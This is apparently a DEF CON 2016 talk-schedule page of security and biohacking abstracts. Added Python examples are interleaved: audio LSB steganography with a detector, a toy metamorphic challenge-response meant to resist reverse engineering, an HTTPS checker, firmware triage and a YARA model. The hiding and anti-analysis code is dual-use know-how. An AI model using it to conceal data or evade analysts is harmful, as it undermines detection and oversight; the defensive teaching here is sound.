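        w.writeframes(struct.pack("<%dh" % n_frames, *samples))
    return buf.getvalue()


def _read_samples(wav_bytes):
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getsampwidth() != 2:
            raise ValueError("example handles 16-bit PCM only")
        params = w.getparams()
        raw = w.readframes(w.getnframes())
    return params, list(struct.unpack("<%dh" % (len(raw) // 2), raw))


def _write_samples(params, samples):
    out = io.BytesIO()
    with wave.open(out, "wb") as w:
        w.setparams(params)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return out.getvalue()


def embed_lsb(wav_bytes, payload):
    """Hide payload in the least significant bit of successive samples, length-prefixed."""
    params, samples = _read_samples(wav_bytes)
    message = struct.pack("<I", len(payload)) + payload
    if len(message) * 8 > len(samples):
        raise ValueError("cover too small: capacity is %d bytes" % (len(samples) // 8 - 4))
    bit_index = 0
    for byte in message:
        for shift in range(7, -1, -1):
            samples[bit_index] = (samples[bit_index] & ~1) | ((byte >> shift) & 1)
            bit_index += 1
    return _write_samples(params, samples)


def extract_lsb(wav_bytes):
    """Reverse of embed_lsb: read the 4-byte length, then that many bytes, from the LSB plane."""
    _, samples = _read_samples(wav_bytes)

    def read_bytes(first_sample, count):
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (samples[first_sample + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)

    length = struct.unpack("<I", read_bytes(0, 4))[0]
    if 32 + length * 8 > len(samples):
        raise ValueError("length prefix does not fit the cover; probably no LSB payload")
    return read_bytes(32, length)


def lsb_transition_rate(wav_bytes):
    """Crude steganalysis statistic: fraction of neighbouring samples whose LSBs differ.

    A slowly varying cover repeats sample values, so its LSB plane changes rarely;
    after embedding, the plane follows the payload bits and the rate rises sharply.
    """
    _, samples = _read_samples(wav_bytes)
    changes = sum((samples[i] ^ samples[i + 1]) & 1 for i in range(len(samples) - 1))
    return changes / (len(samples) - 1)
```

Capacity is one bit per sample, so a payload needs eight times its size in samples plus the prefix; the transition statistic works on this synthetic tone because the cover's LSB plane is so regular, and against real recordings a detector has to model the cover's own noise rather than assume it is quiet.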
Return to Index
BHV - Skyview 4 - Saturday - 12:00-12:59
Speakers: Rock Stevens and Candice Schumann
@ada95ftw
About Rock Stevens:
Rock Stevens began working in IT as an under-paid network administrator at the age of 15. He was selected as a 2015 Madison Policy Forum Military-Business Cybersecurity Fellow and is currently pursuing a master’s degree in Computer Science at the University of Maryland College Park.
About Candice Schumann:
Candice Schumann was born in Johannesburg, South Africa. She was a Computer Science and Mathematics dual major at La Salle University. Candice’s interests lie in Computational Biology and Machine Learning; she is currently pursuing a PhD degree in Computer Science with a focus in Computational Biology.
Abstract:
Want to put your hacking skills to good use? We’re talking about the ultimate good -- curing incurable diseases and improving the quality of life for billions of people. In our talk, we’ll discuss breakthroughs in computational biology and how easily you can help with the skills you already have.
Return to Index
BHV - Skyview 4 - Saturday - 16:30-16:59
Speaker: Victoria Sutton
@CyberLawProf
victoriasutton.org
About Victoria Sutton:
Dr. Sutton is an international authority on biodefense laws and regulations and has served as an expert to the United Nations. She is a lawyer and a scientist.
Abstract:
The next big thing in bioterrorism is likely to be biochemicals that change perceptions through altering neurological responses to environmental stimuli. What if you feel love for your enemy and can't fight them? But they can still attack you? Diagnostics and countermeasures will be our primary defense if these are used. Can international law even keep up with the creativity that is made possible with rapid changes in biotechnology? Will it be a DIY biohacker that comes up with a solution?
Return to Index
SkyTalks - Skyview 3 - Saturday - 17:00-17:59
Speaker: Karl Kasarda, Ian McCollum
Talk: The next John Moses Browning will use GitHub
The rise of the machines will include a new manufacturing technology, and it's rapidly approaching: economic, consumer-level 3D printing using metal.
We have seen the potential of polymer 3D printing and how it has revolutionized prototyping as well as gimmicky widgets. Metal printing will allow us to actually apply this promise to durable engineered products, and the results will change the world. Custom prosthetics, experimental vehicles, project-specific scientific tooling, durable medical devices tailored to the patient: anything you can imagine.
Metal-based 3D printing also means that people will make guns. Polymer 3D printed firearms have captured wide attention but are short-lived. They are a wonderful opportunity for experimentation, but ultimately they are necessarily disposable, bulky, and limited to rather light cartridges. Home-printed metal firearms will provide an opportunity to have all the political implications of a weapon from a MakerBot but with something that can actually function effectively and on par with today's industrial standards.
But guns are not toys; they are potentially dangerous handheld pressure vessels which we blithely expect to contain 50,000+ psi for milliseconds and then unlock and cycle in the blink of an eye. Those who are planning on experimenting with designing and fabricating them will need critical background knowledge.
In this presentation, Karl Kasarda (InRange TV) and Ian McCollum (Forgotten Weapons, InRange TV) will give you a background primer on how a wide variety of firearms work. Because we do not know what opportunities 3D metal printing will ultimately bring forth, this presentation will cover a vast multitude of different ways guns function. Both commonplace modern designs and exotic experiments from the golden age of firearms invention will be showcased.
This will not be an engineering design course; it will be a primer so that you may begin your work on the shoulders of giants who came before, instead of on barren ground. A new Gutenberg Press is coming. While we don't yet know who the Martin Luther(s) of this next reformation will be, we do know that the traditional powers' attempts at gun control will inevitably become more futile.
Return to Index
SkyTalks - Skyview 3 - Sunday - 10:00-10:59
Speaker: Brendan O'Connor
Talk: The Other Way to Get a Hairy Hand; or, Contracts for Hackers
What do an excessively hairy hand, a car-eating loch, a mechanical bull, and a house of ill repute in northern Montana mean for the iTunes EULA that nobody reads?
Legalese is the go-to term to explain (or pretend to justify) overly complex sentences that involve weirdly specific phrases followed by names that don't always relate (hereinafter referred to as "duck wrangling"). While you might cringe at pages of boilerplate, the stories that gave rise to all those words are hilarious and terrifying in turns.
Come join us for a discussion of why contracts got screwed up, what the words actually mean (and what they don't), what you actually need to know (without being legal advice; insert your favorite disclaimer here), and how to push back against "the lawyers said it has to be in there" next time you're signing something.
Get another beer; you're going to want it to toast the memories of all the poor suckers who gave us the law (or their leg), such as it is.
Return to Index
BHV - Skyview 4 - Friday - 10:30-10:59
Speaker: Robin Farmanfarmaian
About Robin:
Robin Farmanfarmaian is a Professional Speaker, Author, Entrepreneur, and Angel Investor, specializing in companies with the potential to impact >100M patients. Currently Robin is an Investor and VP at Invicta Medical, a medical technology company focusing on sleep apnea; VP at Actavalon, curing cancer by repairing p53; and Strategic Relations at MindMaze, VR for stroke and brain injury rehab. Her best selling book, “The Patient as CEO”, can be found on Amazon.
Abstract:
Robin's expertise showcases the future of medical technology, and how the convergence of accelerating tech will enable patients to be the key decision maker, executor, driver and ultimately the one responsible on the healthcare team. Patient empowerment and engagement come through technological advancements including wearable technology, sensors, point-of-care diagnostics, 3D printing, tissue engineering, the power of the crowd, data, networks, artificial intelligence and robotics. These are some of the accelerating technologies set to fundamentally change healthcare and allow the patient to be in control of their own health.
Return to Index
DEFCON - Track Three - Friday - 15:00-15:59
The Remote Metamorphic Engine: Detecting, Evading, Attacking the AI and Reverse Engineering
Amro Abdelgawad Founder, Immuneye
As a matter of fact, it is all about the time needed to reverse engineer even the most complex piece of code. Code complexity techniques are usually used just to increase the time and effort needed for reverse engineering. The desired effect of code complexity can be magnified using mechanisms that decrease and narrow the allowed time frame for any reverse engineering attempt to a few milliseconds. Such an approach can be applied using a metamorphic engine that is aware of the time dimension.
Beyond metamorphic applications for AV evasion, in this talk we will present a novel approach to resist and evade reverse engineering using a remote metamorphic engine that generates diversified morphed machine code with a very short expiration lifetime. Our approach is based on a client-server model using a challenge-response communication protocol made of morphed machine code rather than data. We will show how any reverse engineering attempt on such a model will be forced to execute or emulate the morphed code. Thus the code will always have the upper hand to detect, evade and attack the reverse engineering environment. Our approach is immune to static code analysis, as the functionalities and the communication protocol used are dynamically diversified remotely and do not exist in packed executable files. On the other hand, clock-synchronized morphed machine code driven by a remote metamorphic engine would trap dynamic RE attempts in the maze of metamorphism, one that is immune to code tampering and reversing by detecting the non-self.
We will present the fundamental difference between metamorphic and polymorphic techniques used to evade AV compared to the ones that can be used to resist RE. We will show how a remote diversified metamorphic self-modifying code with a very short expiration lifetime can detect, evade, and resist any code analysis, reverse engineering, machine learning and tampering attempts.
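An added toy model of the client-server idea described above (not Immuneye's engine, and nothing here is machine code): a server emits a freshly morphed program for a tiny accumulator VM, the client must execute it within a time window, and the server checks the answer against the canonical function. Instruction substitution, constant splitting and cancelling junk are the morphing rules; the opcode set, constants and TTL are assumptions for the example.

```python
import random
import time

MASK = 0xFFFFFFFF


def rol(x, n):
    n %= 32
    return ((x << n) | (x >> (32 - n))) & MASK if n else x


def run(program, x):
    """Tiny interpreter over one 32-bit accumulator; this is what a client (or an emulator) must execute."""
    for op, *args in program:
        if op == "add":
            x = (x + args[0]) & MASK
        elif op == "sub":
            x = (x - args[0]) & MASK
        elif op == "xor":
            x ^= args[0]
        elif op == "rol":
            x = rol(x, args[0])
        elif op == "ror":
            x = rol(x, 32 - args[0])
        elif op != "nop":
            raise ValueError("unknown opcode %r" % op)
    return x


# Canonical form of the challenge function; the constants are constructed for the example.
CANONICAL = [("add", 0x9E3779B9), ("xor", 0x7F4A7C15), ("rol", 13),
             ("add", 0x165667B1), ("xor", 0x27D4EB2F), ("rol", 5)]


def morph(program, rng):
    """Rewrite every instruction into a randomly chosen equivalent and insert cancelling junk.

    add k  -> sub (-k)         or  add a; add (k-a)
    xor k  -> xor a; xor (k^a)
    rol n  -> ror (32-n)
    """
    out = []
    for op, *args in program:
        pick = rng.random()
        if op == "add":
            k = args[0]
            if pick < 0.33:
                out.append(("sub", (-k) & MASK))
            elif pick < 0.66:
                a = rng.getrandbits(32)
                out += [("add", a), ("add", (k - a) & MASK)]
            else:
                out.append(("add", k))
        elif op == "xor":
            k = args[0]
            if pick < 0.5:
                a = rng.getrandbits(32)
                out += [("xor", a), ("xor", k ^ a)]
            else:
                out.append(("xor", k))
        elif op == "rol":
            out.append(("ror", 32 - args[0]) if pick < 0.5 else ("rol", args[0]))
        else:
            out.append((op, *args))
        if rng.random() < 0.5:                 # inert sequence: add r ; nop ; sub r
            r = rng.getrandbits(32)
            out += [("add", r), ("nop",), ("sub", r)]
    return out


class ChallengeServer:
    """Issues a freshly morphed program per challenge and accepts an answer only before it expires."""

    def __init__(self, ttl_seconds=0.05, seed=None):
        self.ttl = ttl_seconds
        self.rng = random.Random(seed)
        self.pending = {}                      # nonce -> (expected answer, deadline)

    def issue(self, now=None):
        now = time.monotonic() if now is None else now
        nonce = self.rng.getrandbits(32)
        self.pending[nonce] = (run(CANONICAL, nonce), now + self.ttl)
        return nonce, morph(CANONICAL, self.rng)   # the client only ever sees the morphed form

    def verify(self, nonce, answer, now=None):
        now = time.monotonic() if now is None else now
        expected, deadline = self.pending.pop(nonce, (None, 0.0))
        return expected is not None and now <= deadline and answer == expected
```

Every morphed program is a different text with the same meaning, and an analyst who pauses the client to inspect one loses the race against the deadline. A real engine would emit native code and choose rules that also resist emulation, which this model does not attempt.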
Amro Abdelgawad is a security researcher and the founder of Immuneye. He has more than 15 years experience in software security and reverse engineering. He has experienced both sides of software security in vulnerability researching, penetration testing, reverse engineering, exploit development and the defensive side as a chief security officer for software companies running wide infrastructures. Amro is currently working as a security researcher where his main interests are analyzing malware, vulnerability researching and developing artificial software immunity.
Return to Index
BHV - Skyview 4 - Saturday - 18:00-18:59
Speaker: Andrea Coravos
@andreacoravos
About Andrea Coravos:
Andrea Coravos is the co-founder of Elektra Labs, a digital health platform democratizing clinical trials by supporting remote, at-home research. Andrea is a software engineer focused on digital medicine and neurotechnologies, a digital rights advocate, and a writer for NeuroTechX.
Abstract:
In the past few years, software has started to "eat" healthcare in a new way. Historically, software was predominately a productivity enhancement for healthcare, but now software is emerging as a medical device. Many companies are releasing their own versions of digital medicines. Cognitive behavioral therapy (CBT) apps are coming to market that improve sleep without pills or potions. Companies like Akili Interactive are building clinically validated cognitive therapeutics, assessments, and diagnostics that look and feel like high-quality video games for pediatric ADHD. But how do we know any of these products work? Clinical trials and research are adapting to support the rise of digital medicine, and more research is moving out of the lab and into the home. We'll look at the new models that are supporting this trend, including a dive into Ethereum, a blockchain technology that can decentralize clinical trials, provide an economic incentive to join the trials, and endow participants with stronger rights and security for their data. We'll share what the future could hold for at-home research, digital medicine, and blockchains.
Return to Index
CPV - Bronze 2 - Saturday - 11:30-12:00
Talk Title:
The State of HTTPS: securing web traffic is not what it used to be
Speaker Name, Employer or position:
J0N J4RV1S
Abstract:
Do you truly love your users and wrap them in the warm, confidential arms of forward-secrecy ciphersuites? Or do you uncaringly shove their fragile, unencrypted data out into the cold, transparent tubes, shivering and naked as it wanders across a hostile Internet?
For too long the practice of serving non-sensitive websites over HTTPS has been viewed as unnecessary, costly, and a waste of cycles. Fortunately, the once-plausible criticisms have been challenged and are falling away. Choosing to implement HTTPS is now a matter of principle and it should be fully embraced as the default transfer method for all web traffic.
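Added example (not part of the talk, nor SecureUtah.org's checker): a Python assessment of one observed response against the points the abstract raises, i.e. whether the site redirects to HTTPS, sets a long-lived Strict-Transport-Security policy, and negotiates a forward-secrecy cipher suite. The headers and cipher names are constructed; the cipher-name convention assumed is OpenSSL's, and TLS 1.3 suites are all treated as forward secret.

```python
ONE_YEAR = 31536000


def parse_hsts(value):
    """Split a Strict-Transport-Security value into lowercase directive names and values (RFC 6797)."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            directives[name.strip().lower()] = val.strip().strip('"')
    return directives


def assess_https(scheme, status, headers, cipher, tls_version):
    """Return findings for one observed response.

    headers: dict with lowercase header names. cipher: OpenSSL-style suite name as reported
    by the TLS library (assumed naming convention). tls_version: e.g. "TLSv1.2".
    """
    findings = []
    if scheme != "https":
        findings.append("served over plain http")
        location = headers.get("location", "")
        if 300 <= status < 400 and location.lower().startswith("https://"):
            findings.append("redirects to https")
        else:
            findings.append("no redirect to https")
        return findings                       # nothing else to judge on a cleartext response
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        directives = parse_hsts(hsts)
        try:
            max_age = int(directives.get("max-age", "-1"))
        except ValueError:
            max_age = -1
        if max_age < ONE_YEAR:
            findings.append("HSTS max-age below one year (%d)" % max_age)
        if "includesubdomains" not in directives:
            findings.append("HSTS lacks includeSubDomains")
    if tls_version in ("SSLv3", "TLSv1", "TLSv1.1"):
        findings.append("legacy protocol version " + tls_version)
    # TLS 1.3 suites are all forward secret; for earlier versions the key exchange must be ephemeral DH
    if tls_version != "TLSv1.3" and not cipher.startswith(("ECDHE-", "DHE-")):
        findings.append("negotiated cipher lacks forward secrecy: " + cipher)
    return findings
```

The HSTS check matters because a first visit over HTTP is still interceptable until the policy is cached, which is why a long max-age with includeSubDomains (and preloading) is what "implements HTTPS correctly" means in practice.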
Bio:
J.J. is a resident of Utah and wants to help make the Internet a safer place for everyone. After speaking at Utah's 2015 SAINTCON on the importance of HTTPS he decided to extend his interest in secure communications beyond the Con and commit to advocating for widespread HTTPS adoption. He created SecureUtah.org to serve as an information resource as well as a public tracker of which prominent Utah websites implement HTTPS correctly. His goal is to work with and convince every website to switch entirely to HTTPS and to inspire advocates in other states to champion the cause in their communities.
Social media links if provided:
@SecureUtah
Return to Index
SkyTalks - Skyview 3 - Friday - 09:00-09:59
Speaker grecs
Talk: The Trials & Tribulations of an Infosec Pro in the Government Sector
Trying to be a security professional in the government sector can be quite a frustrating experience. Between government organizations jockeying against one another and contractors trying to turn the biggest profit possible, you can be stuck in a tough position just trying to do the right thing. Come join grecs (and join in the rant if you want to) for a fun-filled session covering the top pitfalls of government information security, solutions for overcoming them, and strategies for changing the culture.
Return to Index
SE - Palace 2-5 - Friday - 17:00-17:55
David Kennedy
Dave loves Chris Hadnagy, a lot… almost too much. He masks it behind a fake love of Bruce Hornsby, but secretly he runs an "I Hate Hornsby" club on the Internet. Similar to Fight Club, its first rule is to not speak about the IHH. Dave is also the owner and operator of TrustedSec, the creator of SET and an all-around amazing guy who gives really good hugs (to those that want them, except for Chris).
Return to Index
IOT - Bronze 4 - Saturday - 17:00-18:30
Thermostat Ransomware and Workshop
Ken Munro, Pen Test Partners
An introductory presentation followed by a demonstration covering hardware hacking topics such as reverse engineering, firmware analysis, remote code execution, even abusing OTA updates. Attendees will come away with a practical understanding of reverse engineering and attacking these devices. We will also go through a PoC IoT ransomware attack specifically for thermostats.
Attendees will see a breakdown of the technology, with a demo showing precisely how thermostats can be compromised. Finally, a workshop will give attendees a solid and in-depth understanding of the security profile of many IoT devices, using readily available home heating thermostats, so that everyone has free rein to hack their own. We'll provide a range of IoT thermostats and tools so it'll be as accessible as possible to all who want to participate.
Typically, access to embedded functionality in thermostats is via their JTAG ports so we will provide a primer on those as well as giving attendees the devices and tools to enable them to fully access the device and create their own hardware attack. Specifically, we want people to come away with a practical, hands-on understanding of IoT reverse engineering and enhanced hardware hacking skills.
30 mins for the demo, and 60 mins for the workshop.
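An added firmware-analysis example (constructed here, not Pen Test Partners' material, and tied to no particular thermostat): the first pass a practitioner makes over an image dumped via JTAG or pulled from an OTA update, i.e. locating format magic values, mapping entropy to find compressed or encrypted regions, and pulling printable strings. The sample image, its offsets and the strings in it are invented; the signatures are real magic values.

```python
import gzip
import math
import random

# Magic values for a few formats commonly found in embedded images
SIGNATURES = [
    (b"\x27\x05\x19\x56", "U-Boot legacy image header"),
    (b"\x1f\x8b\x08", "gzip stream"),
    (b"hsqs", "SquashFS filesystem (little-endian)"),
    (b"\x7fELF", "ELF executable"),
    (b"-----BEGIN", "PEM-encoded key or certificate"),
]


def shannon_entropy(chunk):
    """Bits per byte: 0.0 for padding, close to 8.0 for compressed or encrypted data."""
    if not chunk:
        return 0.0
    counts = [0] * 256
    for b in chunk:
        counts[b] += 1
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_signatures(blob):
    """All (offset, description) pairs, sorted by offset; expect occasional false hits in random data."""
    hits = []
    for magic, name in SIGNATURES:
        offset = blob.find(magic)
        while offset != -1:
            hits.append((offset, name))
            offset = blob.find(magic, offset + 1)
    return sorted(hits)


def high_entropy_regions(blob, block=512, threshold=7.0):
    """Merge consecutive high-entropy blocks into (start, end) ranges worth carving out."""
    regions, start = [], None
    for offset in range(0, len(blob), block):
        if shannon_entropy(blob[offset:offset + block]) >= threshold:
            if start is None:
                start = offset
        elif start is not None:
            regions.append((start, offset))
            start = None
    if start is not None:
        regions.append((start, len(blob)))
    return regions


def find_strings(blob, min_len=8):
    """Printable ASCII runs; update URLs, service credentials and debug hints tend to live here."""
    found, current = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            current.append(b)
            continue
        if len(current) >= min_len:
            found.append(current.decode("ascii"))
        current = bytearray()
    if len(current) >= min_len:
        found.append(current.decode("ascii"))
    return found


def make_sample_image():
    """Constructed firmware image: fake U-Boot header, a plaintext config block, a gzip 'kernel'.

    Offsets and strings are invented for this example; the kernel payload is seeded pseudo-random
    bytes so it is incompressible and therefore high-entropy once wrapped in gzip.
    """
    header = b"\x27\x05\x19\x56" + b"\x00" * 60        # magic plus zeroed fields (CRCs not valid)
    config = (b"\x00" * 64
              + b"ota_url=http://updates.example.invalid/fw.bin\x00"
              + b"admin_password=changeme\x00")
    head = header + config
    head += b"\x00" * (512 - len(head))                # pad the first partition to 512 bytes
    rng = random.Random(7)
    kernel = gzip.compress(bytes(rng.getrandbits(8) for _ in range(2048)), 9)
    image = head + kernel
    return image + b"\x00" * (3072 - len(image))


def triage(blob):
    """One-shot summary of where to look next in an unknown image."""
    return {
        "signatures": find_signatures(blob),
        "high_entropy": high_entropy_regions(blob),
        "strings": find_strings(blob),
    }
```

A high-entropy region with no signature at its start is the interesting case: it is either encrypted, in which case the key has to be somewhere the device can reach it (often in a low-entropy region nearby or in a separate flash partition), or compressed with a format not in the signature list.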
Ken has been working in IT security for over 15 years. He writes for various newspapers and industry magazines, and regularly advises the broader press and news broadcasters. He works at Pen Test Partners who specialize in helping organizations understand and quantify risk to their business. In an effort to get beyond the unhelpful FUD put about by many security vendors Ken speaks widely on computer security, the Internet of Things, and takes great pleasure in highlighting vulnerabilities.
@PenTestPartners
@TheKenMunroShow
Return to Index
SkyTalks - Skyview 3 - Saturday - 10:00-10:59
Speakers: Jen, Darren
Talk: To Beat the Toaster, We Must Become the Toaster: How to Show AI Who's Boss in the Robot Apocalypse
You no longer have to think about your menu or buying groceries. You no longer have to be concerned with driving and travel. Your house is your personal assistant and cities keep you comfortable. But what happens when you wake tomorrow to find your agents of convenience have become vectors of attack and the man behind the controls is no man at all? How do we prevent our toasters from dominating us, eliminating us, or turning us into batteries? You are now engaged in a battle for survival and fighting for the very existence of your species. Enter the world of biohacking and biotechnology where grinders, citizen scientists, and cutting edge researchers are working on the tools we need in order to survive the Rise of the Machines. In this talk we will show how to arm ourselves (perhaps even literally) for the coming battle against the machines. With fervent initiative, open minds, and the right tools and technology, we can and will rise above, or perhaps prevent, the revolt launched by our artificial progeny.
Return to Index
BHV - Skyview 4 - Friday - 16:00-16:59
Speaker: Jennifer Szkatulski and Darren Lawless
@razzies
About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 19 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. She currently specializes in energy sector and industrial control system security. Prior to her career in security, Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids, is learning to play the ukulele, and watches far too much TV. Jennifer should probably get a life. She is an avid fan of the Detroit Tigers, William Shakespeare, and the Oxford comma.
About Darren Lawless:
Darren Lawless is a security analyst with 13+ years of plugging dikes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple of years, resulting in forays, experimentation, and investigation into nootropics, biofeedback, augmentation, implantation, brain stimulation, and sundry wet-tech bad-assedness. Still a squire in the realm, he maintains the ability to ask real-world questions like, "Why (why not) do this? What are the risks? Should we care?"
Abstract:
You no longer have to think about your menu or buying groceries. You no longer have to be concerned with driving and travel. Your house is your personal assistant and cities keep you comfortable. But what happens when you wake tomorrow to find your agents of convenience have become vectors of attack and the man behind the controls is no man at all? How do we prevent our toasters from dominating us, eliminating us, or turning us into batteries?
You are now engaged in a battle for survival and fighting for the very existence of your species. Enter the world of biohacking and biotechnology where grinders, citizen scientists, and cutting edge researchers are working on the tools we need in order to survive the Rise of the Machines. In this talk we will show how to arm ourselves (perhaps even literally) for the coming battle against the machines. With fervent initiative, open minds, and the right tools and technology, we can and will Rise above, or perhaps prevent, the revolt launched by our artificial progeny.
Return to Index
WOS - Skyview 6 - Saturday - 10:10-10:59
To Catch An APT: YARA
Jay DiMartino, Senior Cyber Threat Researcher at Fidelis Cybersecurity
Go from hunted to hunter using your hands. It's time to reclaim your networks and start hunting for big-game APTs, armed with the pattern-matching Swiss Army knife called YARA. Learn how to author YARA rule signatures with techniques used by malware researchers to mercilessly hunt down the elusive adversary, advanced threat actors, and discover patterns in their code. We will review a real-world case example using components from the PlugX APT malware to explain writing beginner to advanced YARA rules. Those who are already familiar with YARA can still come to improve their rule-signature writing skills by learning how to catch different malware family variants, all the while keeping false positives to a minimum.
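An added, stdlib-only Python model of how YARA hex strings and conditions behave (not YARA itself, and not the speaker's PlugX rules; every byte pattern and string here is constructed): wildcards and jumps let one rule cover variants that differ in relocations or operands, while an "n of" condition keeps a rule from firing on a benign file that shares a single string.

```python
import re


def compile_hex(pattern):
    """Translate a YARA-style hex string into a compiled bytes regex.

    Supports full bytes (4D), full wildcards (??), nibble wildcards (4? / ?D),
    fixed jumps ([4]) and ranged jumps ([2-6]).
    """
    parts = []
    for token in pattern.split():
        if token == "??":
            parts.append(b".")
        elif token.startswith("[") and token.endswith("]"):
            lo, _, hi = token[1:-1].partition("-")
            parts.append(b".{%d,%d}" % (int(lo), int(hi or lo)))
        elif len(token) == 2 and token[1] == "?":
            hi_nibble = int(token[0], 16) << 4
            parts.append(b"[" + re.escape(bytes([hi_nibble])) + b"-"
                         + re.escape(bytes([hi_nibble | 0xF])) + b"]")
        elif len(token) == 2 and token[0] == "?":
            lo_nibble = int(token[1], 16)
            parts.append(b"[" + b"".join(re.escape(bytes([(h << 4) | lo_nibble]))
                                         for h in range(16)) + b"]")
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def compile_text(text, nocase=False):
    """Equivalent of a YARA text string, optionally with the nocase modifier."""
    return re.compile(re.escape(text), re.IGNORECASE if nocase else 0)


def scan(rule, data):
    """Return {string name: [offsets]} for every rule string that occurs in data."""
    found = {}
    for name, regex in rule["strings"].items():
        offsets = [m.start() for m in regex.finditer(data)]
        if offsets:
            found[name] = offsets
    return found


def n_of(found, names, n):
    """YARA's 'n of ($a, $b, ...)'."""
    return sum(1 for name in names if name in found) >= n


def at(found, name, offset):
    """YARA's '$s at offset'."""
    return offset in found.get(name, [])


def matches(rule, data):
    return rule["condition"](scan(rule, data), len(data))


# Constructed rule and samples for the example; nothing here is a real PlugX indicator.
# $stub: a call/pop "get PC" stub whose call displacement, sub operand and lea encoding vary
# per build, so those bytes are wildcarded; $cfg and $mtx are strings a family might reuse.
SAMPLE_RULE = {
    "name": "constructed_family",
    "strings": {
        "$mz": compile_hex("4D 5A"),
        "$stub": compile_hex("E8 ?? ?? ?? 00 5B 81 EB [4] 8D 8? 2? 00 00 00"),
        "$cfg": compile_text(b"cfg_version="),
        "$mtx": compile_text(b"Global\\ctrl_", nocase=True),
    },
    "condition": lambda found, filesize: (
        at(found, "$mz", 0) and filesize < 4 * 1024 * 1024
        and n_of(found, ["$stub", "$cfg", "$mtx"], 2)
    ),
}


def build_sample(call_disp, sub_operand, lea_modrm, lea_disp, tail):
    """Constructed 'binary': MZ header, filler, a get-PC stub with variable bytes, then strings."""
    stub = b"\xE8" + call_disp + b"\x5B\x81\xEB" + sub_operand + b"\x8D" + bytes([lea_modrm]) + lea_disp
    return b"MZ" + b"\x90" * 30 + stub + b"\x00" * 8 + tail


VARIANT_A = build_sample(b"\x10\x00\x00\x00", b"\x00\x10\x40\x00", 0x83, b"\x20\x00\x00\x00",
                         b"cfg_version=3\x00Global\\ctrl_1")
VARIANT_B = build_sample(b"\x37\x01\x00\x00", b"\x00\x20\x40\x00", 0x85, b"\x28\x00\x00\x00",
                         b"CFG_VERSION=4\x00GLOBAL\\CTRL_2")
BENIGN = b"MZ" + b"\x90" * 40 + b"cfg_version=9\x00"
```

VARIANT_B changes every wildcarded byte and upper-cases its strings; it still matches because the stub shape survives and $mtx is nocase, while $cfg (case-sensitive) drops out, which is the kind of variant behaviour a rule author decides on deliberately. Real rules must still be run through YARA against a known-good corpus before deployment; the toy reproduces only the matching semantics.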
Jay DiMartino is a Senior Threat Researcher for Fidelis Cybersecurity. He enjoys being a malware defender and has been doing Malware Reverse Engineering for over 5 years, with several industry certifications.
Return to Index
BHV - Skyview 4 - Saturday - 10:05-10:59
Speaker: Tess Schrodinger
About Tess:
Tess is a security engineer and researcher with over twenty years of experience in security and counterintelligence. When not researching and speaking on Insider Threat, Quantum Computing, Security Awareness, and Cryptography, she participates in triathlons and protects the world from stampeding herds of devops unicorns.
Abstract:
What is cognitive memory? How can you “implant” a password into it? Is this truly secure? Curiosity around these questions prompted exploration of the research and concepts surrounding the idea of making the authentication process more secure by implanting passwords into an individual’s memory. The result? The idea is that you are not able to reveal your credentials under duress but you are still able to authenticate to a system. This talk will cover the stages of memory pertaining to encoding, storage and retrieval; the limitations of human memory; and the concept of serial interception sequence learning training. Current research and experimentation will be reviewed as well as the potential for forensic hypnosis to be used to “hack” this approach.
Return to Index
DEFCON - DEF CON 101 - Sunday - 14:00-14:59
Toxic Proxies - Bypassing HTTPS and VPNs to Pwn Your Online Identity
Alex Chapman Principal Researcher, Context Information Security
Paul Stone Principal Researcher, Context Information Security
Rogue access points provide attackers with powerful capabilities, but in 2016 modern privacy protections such as HTTPS Everywhere, free TLS certificates and HSTS are de facto standards. Surely our encrypted traffic is now safe on the local coffee shop network? If not, my VPN will definitely protect me... right? In this talk we'll reveal how recent improvements in online security and privacy can be undermined by decades-old design flaws in obscure specifications. These design weaknesses can be exploited to intercept HTTPS URLs and proxy VPN-tunneled traffic. We will demonstrate how a rogue access point or local network attacker can use these new techniques to bypass encryption, monitor your search history and take over your online accounts. No logos, no acronyms; this is not a theoretical crypto attack. We will show our techniques working on $30 hardware in under a minute. Online identity? Compromised. OAuth? Forget about it. Cloud file storage? Now we're talking.
Alex Chapman is a Principal Security Researcher at Context Information Security in the UK, where he performs vulnerability discovery, exploit development, bespoke protocol analysis and reverse engineering. He has been credited in security advisories for a number of major software products for vendors such as Citrix, Google, Mozilla and VMware, and has presented his research at security conferences around the world. He has spent the past several months making things (for a change), poking holes in old technologies, and pointing out security flaws which have no place in modern day software.
Twitter: @noxrnet
Paul Stone is a Principal Security Researcher at Context Information Security in the UK where he performs vulnerability research, reverse engineering, and tool development. He has a focus on browser security and has reported a number of vulnerabilities in the major web browsers including Chrome, Internet Explorer, Firefox, and Safari. He has spoken at a number of Black Hat conferences, presenting the well-received 'Pixel-Perfect Timing Attacks' and 'Next Generation Clickjacking' talks. Paul's recent obsession has been Bluetooth LE and has helped create the RaMBLE Android app for collecting and analyzing BLE data.
Twitter: @pdjstone
Return to Index
IOT - Bronze 1 - Saturday - 16:00-16:50
Tranewreck
Jeff Kitson, Trustwave SpiderLabs, Security Researcher
This talk covers the reverse engineering and exploration of the Trane ComfortLink thermostats. These devices are manufactured and produced by Trane, a popular heating and cooling company offering Z-Wave and WiFi enabled thermostats packaged with their appliances. This talk covers a previously unreleased vulnerability in the Trane ComfortLink thermostats that allows for remote manipulation and information extraction by an attacker. The devices are vulnerable by default, and this talk addresses the physical dangers posed by this vulnerability to customers. The tools and methods used in finding this vulnerability are also discussed at length in the presentation, along with a video demonstration of the exploit in action.
